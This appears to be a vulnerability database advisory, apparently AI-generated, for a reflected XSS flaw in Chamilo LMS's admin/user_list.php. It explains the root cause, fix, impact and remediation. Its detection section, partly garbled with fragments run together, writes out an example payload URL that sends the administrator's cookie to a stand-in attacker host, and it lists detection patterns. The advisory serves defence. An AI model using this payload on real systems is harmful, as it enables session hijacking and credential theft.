
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52475 is a reflected cross-site scripting (XSS) vulnerability in Chamilo LMS affecting the admin/user_list.php endpoint. The keyword_inactive parameter is not properly sanitized, allowing unauthenticated attackers to inject malicious JavaScript via a crafted URL. All Chamilo LMS versions up to and including 1.11.28 are affected; the issue was patched in version 1.11.30. The vulnerability was disclosed on March 2, 2026, and carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Feedly).
The root cause is improper neutralization of script-related HTML tags and alternate XSS syntax in user-supplied input (CWE-80, CWE-87). Specifically, the keyword_inactive parameter passed to admin/user_list.php was reflected back into the page without adequate sanitization, enabling injection of arbitrary JavaScript. The fix, committed in 349062d, refactored hidden input generation to use the Display::input method combined with Security::remove_XSS() for all additional parameters in main/inc/lib/sortable_table.class.php, replacing manual HTML string construction that lacked proper escaping (GitHub Commit, GitHub Advisory). Exploitation additionally requires the victim to press a specific keyboard shortcut (ALT+SHIFT+X on Windows/Linux or CTRL+ALT+X on macOS) to trigger the injected script (GitHub Advisory).
Successful exploitation allows an attacker to execute malicious JavaScript in the browser context of an authenticated administrator who clicks a crafted URL and triggers the required keyboard shortcut. This could result in theft of administrative session tokens or credentials, unauthorized actions within the LMS admin panel (such as modifying user accounts or system configuration), and exposure of sensitive user data managed by the platform. The confidentiality and integrity impacts are limited in scope but are elevated due to the administrative context targeted (GitHub Advisory, Feedly).
No public proof-of-concept exploit code has been identified, and there is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.045%, reflecting a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for user interaction — specifically, an administrator must click a malicious link and then press a specific keyboard shortcut — which significantly reduces the practical attack surface (Feedly, GitHub Advisory).
/admin/user_list.php endpoint.keyword_inactive parameter, e.g., https://target.example.com/admin/user_list.php?keyword_inactive=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./admin/user_list.php; unusual GET requests to /admin/user_list.php with URL-encoded script tags or JavaScript in the keyword_inactive parameter./admin/user_list.php containing <script>, javascript:, or encoded XSS payloads (e.g., %3Cscript%3E) in the keyword_inactive query parameter.The primary remediation is to upgrade Chamilo LMS to version 1.11.30 or later, which includes the security patch addressing this vulnerability (GitHub Release). As interim measures, administrators should restrict access to the admin panel to trusted networks only, and educate administrators to avoid clicking unsolicited or suspicious links. Deploying a Web Application Firewall (WAF) with rules to detect and block XSS payloads in query parameters can provide additional defense-in-depth (Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."